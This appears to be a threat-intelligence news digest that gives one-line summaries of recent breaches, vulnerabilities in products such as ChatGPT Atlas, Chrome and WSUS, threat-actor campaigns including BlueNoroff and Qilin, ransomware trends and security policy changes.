Major Incidents or Breaches

  • A database containing information on individuals with ‘Top Secret’ clearance who applied for jobs with US House Democrats was left openly accessible online.
  • Toys “R” Us Canada suffered a data breach, as noted in recent threat intelligence reporting.

Newly Discovered Vulnerabilities

  • A new vulnerability in OpenAI’s ChatGPT Atlas web browser allows attackers to inject persistent, hidden commands into the AI platform.
  • QNAP warned customers of a critical ASP.NET Core vulnerability affecting its NetBak PC Agent Windows backup utility, urging immediate patching.
  • A zero-day vulnerability in Google Chrome, exploited in Operation ForumTroll, was used to deliver spyware linked to Italian vendor Memento Labs (formerly IntheCyber Group/Hacking Team).
  • Mass exploitation of year-old critical WordPress plugin vulnerabilities has resumed, with roughly 9 million exploit attempts observed this month.
  • The US Cybersecurity and Infrastructure Security Agency (CISA) ordered federal agencies to patch a critical Windows Server Update Services (WSUS) vulnerability actively exploited in attacks.

Notable Threat Actor Activity

  • The BlueNoroff APT, linked to North Korea, was observed conducting GhostCall and GhostHire campaigns targeting the cryptocurrency sector, using malware chains against macOS and deploying stealer suites and fake job/funding lures.
  • The SideWinder group launched a new campaign targeting South Asian diplomats and a European embassy in New Delhi, using a ClickOnce-based attack chain.
  • Qilin ransomware (aka Agenda, Gold Feather, Water Galura) continues to combine Linux payloads with BYOVD (Bring Your Own Vulnerable Driver) exploits in hybrid attacks, targeting both Linux and Windows hosts, with over 40 victims per month in 2025 (excluding January).
  • A large-scale China-linked smishing campaign used 194,000 domains to harvest sensitive information, including Social Security numbers.
  • A Morocco-based group is conducting a significant gift card fraud campaign (“Jingle Thief”), targeting retailers.
  • Threat actors are exploiting old vulnerabilities in WordPress plugins for mass website compromise.
  • Phishing campaigns are targeting LastPass users with fake death notices to capture master passwords via the digital will feature.

Trends, Tools, or Tactics of Interest

  • Ransomware profits have declined, with only 23% of breached organisations paying ransoms, attributed to large enterprises increasingly refusing to pay and lower payments from mid-market firms.
  • Attackers are leveraging AI to weaponise old vulnerabilities, while defenders face expanding attack surfaces and resource limitations.
  • Malware continues to use DNS tunneling (e.g., BASE64 over DNS) for command and control communications.
  • Chatbots, including ChatGPT, Gemini, DeepSeek, and Grok, are serving users Russian state-backed propaganda in response to queries about the Ukraine invasion.
  • The Qilin ransomware group demonstrates cross-platform evasion by deploying Linux-based ransomware on Windows hosts.
  • Smishing and phishing campaigns are increasingly sophisticated, leveraging large domain infrastructures and social engineering lures (e.g., fake job offers, death notices).

Regulatory or Policy Developments Affecting the Security Industry

  • X (formerly Twitter) is requiring users to re-enrol their two-factor authentication (2FA) security keys or passkeys by 10 November to avoid account lockout.
  • Mozilla now requires all new Firefox extensions to declare data collection practices in their manifest files.
  • Microsoft has introduced a policy enabling IT administrators to remove pre-installed Microsoft Store apps from Windows systems.
  • Microsoft is testing a feature in Windows 11 that prompts users to run a memory scan following a blue screen of death (BSOD) crash.
  • CISA has mandated patching of the actively exploited WSUS vulnerability across US federal agencies.